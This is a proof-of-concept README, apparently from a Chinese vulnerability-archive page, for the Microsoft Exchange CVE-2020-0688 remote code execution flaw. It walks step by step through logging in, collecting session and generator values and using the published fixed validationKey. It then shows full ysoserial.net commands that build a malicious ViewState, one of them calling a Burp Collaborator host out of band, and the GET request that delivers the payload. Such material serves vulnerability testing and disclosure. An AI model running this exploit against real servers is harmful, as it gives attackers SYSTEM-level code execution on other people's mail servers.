来源

关联漏洞

描述

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

介绍

<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same `validationKey` and `decryptionKey` values in web.config. Thus, an <i>authenticated</i> attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of [YSoSerial.net](https://github.com/pwntester/ysoserial.net), an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs as SYSTEM privileges.

<b>Step 1:</b> Visit one of the following endpoints and access to authentication page
- [x] http(s)://exchangeserver/owa<br>
- [x] http(s)://exchangeserver/owa/auth.owa<br>
- [x] http(s)://exchangeserver/owa/auth/logon.aspx</br>
- [x] http(s)://exchangeserver/ecp<br>
- [x] http(s)://exchangeserver/ecp/default.aspx

<b>Step 2:</b> Login with credential (no matter user account privileges), and get valid `ASP_NET_SessionId` and `__VIEWSTATEGENERATOR` values from HTTP response Cookie and HTTP response body respectively. For example

- [x] <b>ASP_NET_SessionId:</b> 05ae4b41-51e1-4c3a-9241-6b87b169d663<br>
- [x] <b>__VIEWSTATEGENERATOR:</b> B97B4E27<br>
- [x] <b>validationKey (Fixed):</b> CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF<br>
- [x] <b>validationalg (Fixed):</b> SHA1

<b>Step 3:</b> In order to generate payload (to check vuln.), use [YSoSerial.net](https://github.com/pwntester/ysoserial.net)

Note that if you have access to victim exchange server, you can use the following payload which create text file in `C:\` directory as `PoC.txt` name
```
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```

However, you can't access to server, may following would be better. 
```
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```

<b>Step 4:</b> After step 4, we'll have had url-encoded ViewState payload. Do GET request at below endpoint as following format

```
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
```

Original blogpost available is [here](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys)

文件快照

 [4.0K]  /data/pocs/d7090dc340de31dd62768a49d759356493f14d1a
└── [2.9K]  README.md

0 directories, 1 file

备注